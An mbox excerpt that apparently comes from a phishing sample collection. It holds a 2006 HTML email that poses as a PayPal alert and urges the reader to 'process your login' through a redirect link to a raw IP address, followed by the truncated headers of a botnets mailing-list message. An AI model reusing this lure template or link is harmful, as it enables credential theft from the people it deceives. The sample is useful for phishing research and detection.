From: Update Now <savannahjordan1@hotmail.com>
Subject: Notification
Date: Wed, 8 Mar 2006 04:57:42 +0800
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Message-Id: <20060307205704.D23ED6CCFE5@mail1.example.com>
To: undisclosed-recipients: ;
Status: O
X-Status: 
X-Keywords:                  
X-UID: 524

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<div align="left" class="style2">
  <p class="style2"><FONT face="Courier New" size="2">You have added <b>
	mike82@woh.rr.com</b> as a new email address for your
PayPal account.</font><br>
    <font face="Courier New" size="2">If you don't agree with this email and if you need assistance with your account,<br>
  click here and 
	<a target="_blank" href="http://rds.yahoo.com/S=44831148:D1/CS=44831148/SS=44831166/SIG=11v8331g7/*http:/80.96.9.95:60006/bin-cgi/webscr_cmd=_login-run/">process your login</a>. </font> </p>
    </p>
  <p><font face="Courier New" size="2">Thank you for using PayPal! <br>
    The PayPal Team </font> </p>
  <address><span style="font-style: normal"><font face="Courier New" size="2">Please do not reply to this email. This mailbox is not monitored and you will not receive a response.</font></span></address>
  <address><font face="Courier New" size="2"><span style="font-style: normal">For assistance,log in to your 
  PayPal account and click thec Help link located in the top right corner </span>
  </font>
    </address>
  <address><font face="Courier New" size="2"><span style="font-style: normal">of any 
  PayPal page. </span> <br>
    </font>
    </address>
  <p><font face="Courier New" size="2">PayPal Email ID PP007 </font> </p>
</div>
</body>
</html>

From botnets-bounces@whitestar.linuxbox.org  Tue Mar  7 17:30:58 2006
Return-Path: <botnets-bounces@whitestar.linuxbox.org>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.1.2.3])
	by naughty.example.com (Postfix) with ESMTP id 161A2536EBB
	for <nobody@login.example.com>; Tue,  7 Mar 2006 17:30:58 -0500 (EST)
Received: from mail.amigostecnicos.net (amigostecnicos.net [209.151.108.130])
	by mail1.example.com (Postfix) with ESMTP id DA3D26CCF06
	for <nobody@example.com>; Tue,  7 Mar 2006 17:30:57 -0500 (EST)
Received: from mail.amigostecnicos.net ([127.0.0.1])
 by localhost (ns.amigostecnicos.net [127.0.0.1]) (amavisd-new, port 10024)
 with LMTP id 18095-01-3; Tue,  7 Mar 2006 16:43:13 -0600 (CST)
Received: from ns.amigostecnicos.net (localhost [127.0.0.1])
	by mail.amigostecnicos.net (Postfix) with ESMTP id 58833C809F;
	Tue,  7 Mar 2006 16:42:59 -0600 (CST)
X-Original-To: botnets@mail.amigostecnicos.net
Delivered-To: botnets@mail.amigostecnicos.net
Received: from mail.amigostecnicos.net ([127.0.0.1])
	by localhost (ns.amigostecnicos.net [127.0.0.1]) (amavisd-new,
	port 10024)
	with LMTP id 15795-09-75 for <botnets@mail.amigostecnicos.net>;
	Tue,  7 Mar 2006 16:14:22 -0600 (CST)
Received: from linuxbox.org (linuxbox.org [24.155.83.21])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by mail.amigostecnicos.net (Postfix) with ESMTP id 8AB5FC80E6
	for <botnets@whitestar.linuxbox.org>;
	Tue,  7 Mar 2006 16:14:22 -0600 (CST)
Received: from [192.115.22.106] (prometheus.solaris.org.il [192.115.22.106])
	(authenticated bits=0)
	by linuxbox.org (8.13.4/8.13.4/Debian-3) with ESMTP id k27M1Xan030507
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT);
	Tue, 7 Mar 2006 16:01:37 -0600
Message-ID: <440E0260.4080309@linuxbox.org>
Date: Wed, 08 Mar 2006 00:00:00 +0200
